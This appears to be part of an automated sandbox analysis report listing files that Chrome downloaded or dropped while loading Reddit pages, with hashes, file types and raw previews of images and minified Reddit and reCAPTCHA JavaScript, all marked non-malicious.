                                                  Preview:RIFF....WEBPVP8X......../../..ALPH......jm."I.22...g.3..K..I..L.....w...^.33CUD....X..1.......o....~......C%.{.G...}R.&.H.^.r...S.^?(5.UA+:.....oS......A:.%ec3..s.{J.#..A..fl.Gx@.#.U.Zl&j.&...C*.C..L..=:R5..z`.h....F7..L.8qC...m.b.lZ. Io...L.MI......M.j.O..h2..H'I."M....8..el...k..(...I...~..X..1E.c.ccc....rl.)...%..."..7gI%%n.-.e..;.v.v..f..e.........KU...{z6.;.+-.....l.|.X..]%b{:..\Q...H..m.....9...=9.$>...Z.~$a{R.I..A..7..3.cO..$~.F..m........t....hA......:..h.Z.........?.j...UO..9...9..O...&XK....0C.|y.f..dC...~.........n....s..4*.VP8 ....P....*0.0.>I..D"...l..(....N.a.....).e.q...v.y...g...fY.o.~*.......m.w............g...1.c...../T......x.v....o.?....9}$.%.............-.....o..........{/..6......%.1.QZx[..77k.wK.=TmvD.?...1.,k..5...Q.HY.'. .....<.<M.. .....4...].0./.@..N..Qfu..,...*.v.A.u...~.x.FLL<....a".U!.4......=.[.....Xo.<,.....d."~G....<&.....7s..0.8#...O...~C...^...........m...j.W.P:_....IG......u4xym.Q.^.....4..D..D/;.....>...
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):2987
                                                  Entropy (8bit):7.86981826593137
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2A8C4B676A2AD8A6D126F91B3203414C
                                                  SHA1:5426CDAFBFE4F6848601D2DC903142EBC89E2B70
                                                  SHA-256:25595623259374865B156D24D8A370A9CD411021AAF3687D8E28DB3B36BBED2A
                                                  SHA-512:17430C7ABE61D12D78587D777B6A339D85281AA673BF2120AE041F6F6650E985646CD2887E60E4DA6A6B9C6BF75A6DC145DB0529992736EC6CEA7B5A3C66A6C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE5HZ.....5'1*DZ8-B/.7...P&>)+5' ,/9=V*T6#=.@K>2U# 9MNUK.A*5>......).4V/Z)/I !*C#J...pbn9(:@+6."<.bj...!.#...*.'.%GeVd...M6FP>R..._>L...sXj..2;J?.(5...?.)FU`.2Q...X';.....=)5R5+I>EV...7.32;U...ZM]ML]P0H.$C&.!/,9L'T.v....... ....#>2>."44:E.. ..-.../.'$.'@2D..)...C:H..'F.@..._4F(.*".$QU_..!...52>".!..4*1N/,A..(3#E.)JE:P...61P.`h....).y..2;..0..,..-|lv;CJG!:*%:B.I_hk14G\..M.IO(EELE...6DSddp...".5......=.7)5D......vlyD.@ZWgx"2.9R.@H*.5....LW.. -.#:;O/.%... .#...miwD+T..2'*D. 0S8L..t{.82I......&."..*#/N<./mOWD.)0.+D.1.....;.)KgZiBKX...4%8@26[]e7#-%,?.5O#.3.... 4#$A.0Bms.UKU...CFQ+-;2<L...0 ). 4=5K8."..A5..&. .1=....?[\6J...D&;...L.>%&/;.F..#$'>:*3<*O.~.<;H.....,...5.*~t....\j`..:"..W2B.ds$9T..,......E.8/&3s(Al$?.#=. 4.....O:.+CAI..,..*:??yw.=$A..'KET!..er|Q.0I.=..,.....pHYs................QIDATx.E..T....o.....e..146.....L%8.8.F.@.!.klU.....)..... %a.!.. ...Q..!..(.?B0#.X....../.....=.......{.p.{q........t._=s..>..Q.n...p.>..._\...4x7"...~
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2079)
                                                  Category:downloaded
                                                  Size (bytes):2141
                                                  Entropy (8bit):5.2933756867035635
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E64C6BCFC4AFBEFFF31AAF0FE7A73DCF
                                                  SHA1:61A823CEA75F4F64C7736F974085ECCC40F9FE32
                                                  SHA-256:FCD709C945E473090C889F3EF4BA7DFE7B3AFAAB30C49FA9E8504F68FFBAF12B
                                                  SHA-512:53022921E4DACA663A5EA4E6C007600D20415B0370744B9CBF0FA3E0537E0C0539C783BA6836B75248FA595405C00A3B138878A33C17439AA6EDF0BF9C1B5267
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-post-list-client-js-2beb017f.js
                                                  Preview:import{t,_ as e,n as s,P as n,T as o,e as i}from"./shell-4994f581.js";import{s as a,x as r}from"./icon-4d9be652.js";import{g as p,c as l,a as c,C as d}from"./content-tags-a63901fd.js";import{P as h}from"./overflow-menu-actions-fd509c7d.js";import"./distinguished-tags-28b29a34.js";let u=class extends a{constructor(){super(),this.postId="",this.spoiler=!1,this.nsfw=!1,this.quarantined=!1,this.clubContent=!1,this.app="",this.onPostUpdateAction=({postId:t,action:e,value:s})=>{if(this.postId===t)switch(e){case h.markAsNsfw:this.nsfw=s;break;case h.markAsSpoiler:this.spoiler=s}},this.pubsubController=new n(this)}connectedCallback(){super.connectedCallback(),this.pubsubController.subscribe(o.PostUpdated,this.onPostUpdateAction)}disconnectedCallback(){super.disconnectedCallback(),this.pubsubController.unsubscribe(o.PostUpdated,this.onPostUpdateAction)}renderContentTag(t){const e="club-content"===t?p():l(c()[t]);return r`<span class="h-lg inline-block">${e}</span>`}render(){return this.nsfw||th
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (5658)
                                                  Category:downloaded
                                                  Size (bytes):5704
                                                  Entropy (8bit):5.197938327856374
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:556D424B55D81AFCFE9223DDEBA95AAB
                                                  SHA1:4C428154557846568D110824AF571B1EFA35FE2C
                                                  SHA-256:160837431B0ED28702EC49013E5DAC0769DF1CFC043FF802FC471D341B86B251
                                                  SHA-512:4D05368B5480CDED10A3D43C6F3828AEBCB4C21CB7688458B7D33478E6C88E6B7E3EA7299B81FB421878D6A552CB58459201B9FB63F8918042955ABE9390DF10
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/helpers-ca93cf1a.js
                                                  Preview:import{_ as e,n as t,E as i}from"./shell-4994f581.js";import{a as r,x as o}from"./icon-4d9be652.js";import{F as s}from"./filterNullish-3e68f24c.js";const n={checkbox:()=>"This checkbox must be on",radio:()=>"This radio must have a selected option"};class a extends s{constructor(){super(...arguments),this.required=!1,this.name="",this.initialized=!1,this._events=new i(this),this.ariaRole="checkbox",this._checked=!1,this.ellipsis=!1,this._handleClick=this._events.define("click",(e=>{this.disabled||e.defaultPrevented||this.handleInteraction()})),this._handleKeydown=this._events.define("keydown",(e=>{this.disabled||e.defaultPrevented||"Space"===e.code&&(e.stopPropagation(),e.preventDefault(),this.handleInteraction())}))}get checked(){return this._checked}set checked(e){const t=this._checked;e!==t&&(this._internals.setFormValue(e?this.getAttribute("value")||"on":null),this._checked=e,e?this.setAttribute("aria-checked","true"):this.removeAttribute("aria-checked"),this.hasAttribute("required"
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (437)
                                                  Category:downloaded
                                                  Size (bytes):505
                                                  Entropy (8bit):4.97775019486644
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C377F5ED4E040B9AAA343013501171A3
                                                  SHA1:F09E6CE373BDE06FB84FA4F3AE5E20A4D7A768A8
                                                  SHA-256:18670D01ADB484B1E5E58F7284546E516FEA3ADAD952DF105D702FCF11463881
                                                  SHA-512:CFBE03F181B44A624FE4E4DF5149F1290E82502EEC401435317A04C2A33162D0296628AE71F680C806055FCFD28E321FE5D196BC3935B30B316375EADF1D169B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/authentication-unit-client-js-709b9601.js
                                                  Preview:import"./community-value-upsell-bottom-bar-client-js-c411c424.js";import"./auth-flow-sso-buttons-894aeb0c.js";import"./shell-4994f581.js";import"./icon-4d9be652.js";import"./ui-strings-aad5fab2.js";import"./auth-flow-controller-2182cb9c.js";import"./password-recovery-fa619c78.js";import"./helpers-82480d34.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./google-api-d2fdd9a3.js";import"./with-recaptcha-72aa2ce9.js";.//# sourceMappingURL=authentication-unit-client-js-709b9601.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):1903
                                                  Entropy (8bit):7.705529492570265
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:2622044F65B2ACB1FFA24EC02D8438AF
                                                  SHA1:78F2693B5611E3247F35A7572B3274F399E35BFA
                                                  SHA-256:A70BF3077BCCDBA5748FB071590FFCFD9C6AB08A1AAF550E439E7379F0C4827A
                                                  SHA-512:14CFB626CB46875EBAB786CEEF0283C76397CD10E3191B30B3338E4A3D7C9B2E97E8CEE1CABAB08377929E5432FC0F7A2E40B2CB8E5746513967D8E09737F95C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/marketplace-assets/v1/core/awards/popcorn_v1_40.png
                                                  Preview:.PNG........IHDR...(...(...... H_....PLTE....s..s..t..s..t..s..$..{..s..s..$..t..#..s..%..p.....s..%..$..$........%..r..#..x..p...z..[.t..K.....s..y ....$..$..s.....%.....(..... ..s...U....E.....$........y...j..........}..............`..Q.5.........K..D................................u../..).....................................?..1..&.. ....{...........&.....................................................Q..L..A..@..5.4..,..%........M.....@..<.........................................|..t..j.d..`.._.e>.p=..;..;..%.z$.=.....P..........3..,..).............................................................................................|..{..v.s..p..p..o..n..k.|k.sY.}W..P..P.M..J.[G.s?.Z?.h0.,..'.\ .X ...S..8.....V..{..1..u.....i.._..D..0.........tRNS..@.0`@.....p` ......P ........pP@0 ...RN.....IDAT8.e.c..A..si........Q..Am.m.m.m..:..\....o.;..Nvu..H..8Y2.N.3].U.2...e`J..@.......u.....i......gH.%.....6.G9....~.F...O.e....C.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2073)
                                                  Category:downloaded
                                                  Size (bytes):2144
                                                  Entropy (8bit):5.105089892591619
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:8C386BBA2F0C22631BF5BCB915474262
                                                  SHA1:31AF1221722820A4075894F78E956D47E5723E59
                                                  SHA-256:1680B1585F033A6339AECDDC2B79BAFB6C07ABA5FCE2C2C58D6F6F8C1684F5E2
                                                  SHA-512:662CFAAF23A5CA5D0AB01706F17C8EA82EA552B4CB1CD247B4AF4A956EC19B0BCA508A6FE744953D1C87FD1A290501F9B544718A681D78E7286D0D4C75892E01
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/dsa-transparency-modal-client-js-68587b84.js
                                                  Preview:import{t as e,_ as t,n as s,c as o,aF as i,b as a,e as r}from"./shell-4994f581.js";import{s as n,x as d}from"./icon-4d9be652.js";let l=class extends n{disconnectedCallback(){super.disconnectedCallback(),this.resizeObserver?.unobserve(document.body),this.resizeObserver?.disconnect()}connectedCallback(){super.connectedCallback(),this.resizeObserver=new ResizeObserver(this.onResize),this.resizeObserver.observe(document.body)}constructor(){super(),this.impressionId="0",this.partialSrc="/svc/shreddit/dsa-transparency-modal/",this.getModal=()=>this.isDesktop?this.querySelector("faceplate-modal"):this.querySelector("faceplate-bottom-sheet"),this.initModalCloseListener=()=>{this.getModal()?.querySelector("#dsa-transparency-modal-close")?.addEventListener("click",this.onCloseModal),this.getModal()?.querySelector("#dsa-transparency-modal-done")?.addEventListener("click",this.onCloseModal)},this.dispatchCloseDsaTransparencyModalEvent=()=>{this.dispatchEvent(o("dsa-transparency-modal-close"))},thi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                  SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                  SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                  SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:OK
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (15246)
                                                  Category:downloaded
                                                  Size (bytes):15308
                                                  Entropy (8bit):5.216948710637153
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3C504A381BF85F8DE120E4EA49C27851
                                                  SHA1:4F70416F9A1A6648C7203BA4D8DCED5C659BA194
                                                  SHA-256:F906F119EB5271319716E66143473693651F94291FB940A674C014EB76B22795
                                                  SHA-512:1DD459A0A80A6DC98A98CDC050E3EB73084FD4FF3B422BD72E6FD30CF40801E52F1D1C06A5505DC4616BA2DB358825A6ABCDA5DD46715FD8CBADC9027EEBEE26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/unpacking-overflow-menu-d0d2ca01.js
                                                  Preview:import{t as e,_ as t,n as i,g as n,j as o,aD as s,u as a,v as d,e as r}from"./shell-4994f581.js";import{B as l,s as c,a as u,x as p,c as m,I as h,v as b,aW as M}from"./icon-4d9be652.js";import{c as I}from"./content-action-button-5fdf727f.js";import{l as g,L as A}from"./expandable-section-header-e3f969c2.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./app-selector-client-js-489f074c.js";import"./faceplate-bottom-sheet-header-b31e0ad4.js";import"./select-controller-fa3db659.js";import{W as f,p as k}from"./with-post-actions-283c4a7a.js";import{bf as w}from"./club-award-confirmation-client-js-b22d6f4f.js";import{b as y,c as S,E as v}from"./with-share-687454db.js";import"./subreddit-posting-eligibility-cf0ca862.js";import"./index-56e4320e.js";import"./rpl-tooltip-958cc522.js";import"./tooltip.base-aa9be46d.js";import"./rpl-popper-3f91bd17.js";import"./profile-creation-61d368d7.js";import"./award-controller-7d9d8182.js";import"./awardsTelemetryState-36bf2914.js";import"./promote-p
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 320x179, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):12732
                                                  Entropy (8bit):7.983785172088759
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DE1D06AE7F21E1E7F45CC5332744229A
                                                  SHA1:CB4E0DC9A181D77D418F1D0353CA114357355885
                                                  SHA-256:2F8AC17BF8826B591FE3B746F70E8A6FE374534A9FC16713C9F5A9D7051A5C40
                                                  SHA-512:393E7A922BC2A237316BD6C47E460B94642E2411C4B8E2A663F9AE9160350FFE157EEAEF9D5BFFB18F98832A440FAE5E57EC3D73267226504F777DCD70597FEA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/new-oscars-rule-if-you-dont-see-all-the-nominated-films-you-v0-cmKiQRTdAG60tRvxu0TW4Zn5IR8liBQippjgcfwwgPc.jpg?width=320&crop=smart&auto=webp&s=b91a6267ef92527b98a4fb7cc6ea3e8e2e1e7735
                                                  Preview:RIFF.1..WEBPVP8 .1..0....*@...>Q".E#.!...8..............}..`...*.@...<.y..o.HC.|.:S.'..Y..=...y..R....s..[..K....M....._....?..'...|.......c.........$...{.O.}........_`....\......Q..a.....F.....Y.........L.d.X....A.W.3............q.q%....W..m..P."../.Kn..,.../q.k.\P.`..J..h.....4.@.ds.../..)l.11.H.p.`sJ.rv.b..D....m...[V8t.C.....z....:..L....s......E._.!W...`2<m..M..y..m...R.)...T.(..b:...o..E../T[.M..r.5.....Cw......;..'.w;..Me......Y*0...:...8.['~R...n..^..J...iR...`...../~..1}>..u..X4.t.....N.GI...I.qk....d.CW...*..|....1(.........,.D......M.....z.P-..$..../S...n=.....J..WO.......k.r../.-..Dd.E.5C.L.....q..'...d.Q.V(...j...d..5..;$F4.}..b...a.,..rw..p....I....*.=.V...j..K.....;..M..Z.3\.2.\...R....'6....r...w{i.=.c.r.a.j*#.Tk.)D..U..%Uk''5...8..f...L.8.....#.R]..S.....#2w..s.$....kFqGH,..I)..F...)#..g..t-.h..+...w#...;...).N.....N....f.....Z.AA.P.,=*.........U....#"..> .2..+.w..$.=../E..4..M!.]..R.<]2'..k.}31x...P..."...I|......sMD.lO
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):3030
                                                  Entropy (8bit):7.92214521771055
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:DF77EDB33D62FC48A8E6386B0959D378
                                                  SHA1:76FDC48A5AAD7E2467DA7DB1BDAF35F16885D9B2
                                                  SHA-256:EFCB58261A21976501CF3EECE9C92C5ABF2461EE16081C5B10670D3387030DE1
                                                  SHA-512:8CD63423DE2299E6F256AD730DE3913D3A9D84AAAC234CCD79DB8143484C837A72AE2842DE5C6CB5634E09EF6ED4559DDDCCF86CB23A28CBF3A76B802AD7077B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://emoji.redditmedia.com/hifk3f9kte391_t5_2qo4s/nba-1
                                                  Preview:.PNG........IHDR...@...@......iq.....IDATx..yp...?.==....,Y.....Vd...v.......8!.I......j7Gql*....I..BX..9H ../..l.y.7..{Fs.....Y.d.`....W5U........w...5..oR*..<2D$.`.#.U..q.$X....H>F..,#.......k.e....zO...U....>....I......%...{..5.Z..mA.qg....8.oy...y.!..[......&....#....u.....zW....$x....H..h..S..k._|...U%)...Jf/..s...7c.).x....UM.,.cdY.g`..E.N.<................*!.....)~.n..T...Jf..i......i.(_.........M.#..2.@$...J.........).`....."_r.b.%.`h$..rn_.bZ.CO<5E,E.../%.N...@...(.'....:..82........B.3...QT.XF..H.&..jb'..u...../..B?.?[...+E.z.H5....N|U.dIb4. :..h..Q..4.8I.....Vc...eC$..%.H1...H.A.$z.....,./fvi..e..-.%U....;...3H.-P..L|l..%-\..L....qe#.].....S.7.A@ .c0..O/..@.`...X...w.._P..w..}'..X.H.8.o].0.I.{............%E..;V..r.,.. .Ab..Hn5.*.r..Y"rx...-a......]....a0.1..6..Q....k.k..\.+Z......6){..$.P...M.,.+.H........X,.$@.`$.W/Z.Y..pU.. .._.z.:..T4U../,..Z..%$..kQ..PZ..z$.g../m............P`"....%.,sk.Y{q..].V1....]q..q...@...+.%/.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (6709)
                                                  Category:downloaded
                                                  Size (bytes):6769
                                                  Entropy (8bit):5.122850424586692
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0174D5A47B273737CB70A92CC88B1295
                                                  SHA1:2F7D79066515BDAB8734BCE58FB77BF9FB2FC40D
                                                  SHA-256:717E6FBA54D73BE376535076BBA3E52BB6C599A34614CD10BDC5F4FADE925039
                                                  SHA-512:3C63D69E38ABB0AD814841AA6B0CF6089DFC6E340DAD8617AB20209164D595053E2724255EC9A365D84616A3421ED9AB9229ED43C71B2715E8E59B1D49F9E006
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/overflow-menu-actions-fd509c7d.js
                                                  Preview:import{M as t,A as e}from"./distinguished-tags-28b29a34.js";import{K as o,O as i,h3 as s,h4 as a,h5 as r,fe as n,eZ as d,h6 as p,fh as m,h7 as l}from"./shell-4994f581.js";const c=["isPostFollowed","isPostHidden","isPostSaved","isPostSpoiler","isPostNsfw","isPostCommercialCommunication","isPostDistinguishedAsAdmin","isPostStickied","isReceivingPostReplies"];var u;!function(t){t.follow="follow",t.hide="hide",t.save="save",t.delete="delete",t.markAsSpoiler="mark_as_spoiler",t.markAsNsfw="mark_as_nsfw",t.markAsCommercialCommunication="mark_as_commercial_communication",t.distinguishAsMod="distinguish_as_mod",t.distinguishAsAdmin="distinguish_as_admin",t.updatePostFlair="update_post_flair",t.lock="lock",t.sticky="sticky",t.addRemovalReason="add_removal_reason",t.edit="edit",t.updateContent="update_content",t.updatePostBodyPending="update_post_body_pending",t.approve="approve",t.remove="remove",t.removeAsSpam="remove_as_spam",t.ignoreReports="ignore_reports",t.confirmRemoval="confirm_removal"
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 640x1138, components 3
                                                  Category:dropped
                                                  Size (bytes):78341
                                                  Entropy (8bit):7.968920309724047
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A2C337549F51479D0283666398FB00F7
                                                  SHA1:BF39B7F827D33B1E68637F637EFCCE9E413085CA
                                                  SHA-256:8D2F2FAD8E10A331E688E3B2BDFA9BBDE443A0C3666E9E6B18F1EC9BD45925CD
                                                  SHA-512:652CE096AAC08EB5A63CA8FDC559003DA5C8F3BC069683AE57C5E8E5D4C19FC967E85967CE5A4B98FB22AB38CCD15A1D5BD0EAE6E5DB98559D3FE030E6124886
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......r...."..................................................................................,......................................................................................................................................................................................................................................................................................................................................................................................................................................................................,}O.?g0>....C.U..i...v..|..o....|.8}...G......_.(N.}...3...?S>..P._.....3..r{./.:....,?A}.N7?8..>.q\..U......\.(9V..L.>s..g....}F........t..u.....O......be.......|o.......I8.Vn.s.8or<.?....~L....._f..~...g.w_t...;?q.:...Pq.....G/....'U..Q.....}|z|y...Y.7V.w#Q.[.9.h[...w.od>Z..:...MrS.t..@$.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):4064
                                                  Entropy (8bit):7.942527127070639
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:308DCC639F2C302CB6F455390F43E0B4
                                                  SHA1:8C14FD3D7DB01712C11E242C40068A0865A7CE0E
                                                  SHA-256:452FC24C722B4BBA8B489382CAF8FD07A5F7495744ABE9D4C5FBBA3D7A2D6CE6
                                                  SHA-512:38964189526722D7C1C3B739E20CCB4B1854577DE0517FD8B3E7C34DE88AE4AEC21DEB1118D786F7C35C0D20615288E2121ABF57C9FC7CA5BC17F125F365AC94
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2qh22/styles/communityIcon_18jg89hnk9ae1.png?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=fd029310c85c6c9e1af990ff8efac4e36fbdda01"
                                                  Preview:RIFF....WEBPVP8X........_.._..ALPHf......m.!I...h.m.m.m..m.m...c{.".}~.^......>s.K.=...d..T..f...HJz......G.....S....@.}qS.IJ%.\.......=.Qg?DiaJ.h...x..N*.{..=..[.JsK^ ..%=.3.....V...]...~/Iy.(I.?..._7.u....()..eI.{.S...O.Z.........=S.).R.@..?s.5g^|.R.....Un:...j...........s......}.......R.W..kG..n.s1w.....u..}......ml.Yc....{.J...,...>.[...~.J..?1.m.56.r..Dg....'T.%=.vZ 0w...IOZ..f....d.l.#a...c=k.....3.-.9...?'...U8...W.S..+G..f...$...e..jL?<N....&.+.P.........U.Q...Wb..n.I9..[.T:.U...".U......._....x.R....B..Gw.{T..}...B.+....`......tf.n..R.IOZ.....?....Cg..].P...M..u.....-:..!v.Nc.c.d.7.F.=.@..Zy..C.>......H*.4w.6.....z ..*E8p0TvV./k......E..N..c|.n(..*....=.7n~.R.......*+`..x...B%B.s+...xk.Ig...1.0..E..2.......b.fw|H..4GR.IT..q..{...).+h8.........~..t,..l.X...^..p.g.....S.Sq.........2x.t..K..e?l..:./.9.q.\<..3..{....R:..../W.I...s}...I.8........w..a..Gag....w`.....+...z.#..2X..%.Ki8..3.........S........!p......~H.}.Z.B..kt&.mn
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1666), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):1666
                                                  Entropy (8bit):5.763331407340012
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:368C43354D32A70552516C7EB064504D
                                                  SHA1:18FED4CBD80C01366E935FA87442CB5740CEDAA0
                                                  SHA-256:8E50E621E2E80AD9E02E6DE0618B98A1B78A3C9030AE4A35E925048CEF1B0780
                                                  SHA-512:37D4A1E3B718CC5246861D8ECF9213AFD5EB797CD2B854202F712D5A03C09A2F6AB1015F9EEBCA68458B2B8EF13A938E25ACED29E807676E406C13653DEB3889
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.google.com/recaptcha/enterprise.js?render=6LfirrMoAAAAAHZOipvza4kpp_VtTwLNuXVwURNQ
                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/enterprise/';(cfg['enterprise']=cfg['enterprise']||[]).push(true);(cfg['enterprise2fa']=cfg['enterprise2fa']||[]).push(true);(cfg['render']=cfg['render']||[]).push('6LfirrMoAAAAAHZOipvza4kpp_VtTwLNuXVwURNQ');(cfg['clr']=cfg['clr']||[]).push('true');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A7vZI3v+Gz7JfuRolKNM4Aff6zaGuT7X0mf3wtoZTnKv6497cVMnhy03KDqX7kBz/q/iidW7srW31oQbBt4VhgoAAACUeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJEaXNhYmxlVGhpcmRQYXJ0eVN0b3JhZ2VQYXJ0aXRpb25pbmczIiwiZXhwaXJ5IjoxNzU3
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (709)
                                                  Category:downloaded
                                                  Size (bytes):754
                                                  Entropy (8bit):5.288639462566633
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:C2C1219C5772E860F71F194B488C9F39
                                                  SHA1:9D7AA390A9153B6D6F61870180BFA816963E9594
                                                  SHA-256:EEB6E8AEC59AE3AB95ED024D9446D15E3E615EE582DD1ABBEB12803B7C685DAA
                                                  SHA-512:B3EF5924947307BF60E15C248ED17BBFD39B1ACC3D3D582167906EF3F167B01D9667D5C735938D911BBDAEEC045D6F3DCAAEE2AF7D4A3172A6986D48632C25D5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/number-68db534b.js
                                                  Preview:import{e as t}from"./club-award-confirmation-client-js-b22d6f4f.js";let o=function(){try{return"1E4 bits"===new Intl.NumberFormat("en",{style:"unit",unit:"bit",unitDisplay:"long",notation:"scientific"}).format(1e4)}catch(t){return!1}}();const n=1e3,i=1e6,r=1e9,e=t=>t>=99999999949?`${Math.floor(t/r)}b`:t>=999999949&&t<99999999949?`${(t/r).toFixed(1)}b`:t>=99999949&&t<999999949?`${Math.floor(t/i)}m`:t>=999949&&t<99999949?`${(t/i).toFixed(1)}m`:t>=99949&&t<999949?`${Math.floor(t/n)}k`:t>=n&&t<99949?`${(t/n).toFixed(1)}k`:String(t);function a(n,i,r){if(o){const o=(null==r?void 0:r.options)||{notation:(null==r?void 0:r.short)?"compact":"standard"};return t(i,o).format(n)}return e(n)}export{e as _,a as f};.//# sourceMappingURL=number-68db534b.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2008)
                                                  Category:downloaded
                                                  Size (bytes):2073
                                                  Entropy (8bit):5.022022617293363
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6496C8B77A312962E30A248F94CA51C1
                                                  SHA1:FE88584FE4FDF5B144DDBDB1750289CDAEA53AE5
                                                  SHA-256:C663848F56C10D7238C5651A9AA0A284D86311D8AC5A56C8A7D3F3586FB48BA0
                                                  SHA-512:162C69752A782380DB3A90D59BDC90977DAED418B682DD5A19657E23810009226B7A464871A8F4C6A24054C4144A6E16EA6B86B2510D4DD4C4A29E66929D77A5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-feed-page-loading-7a9d44d9.js
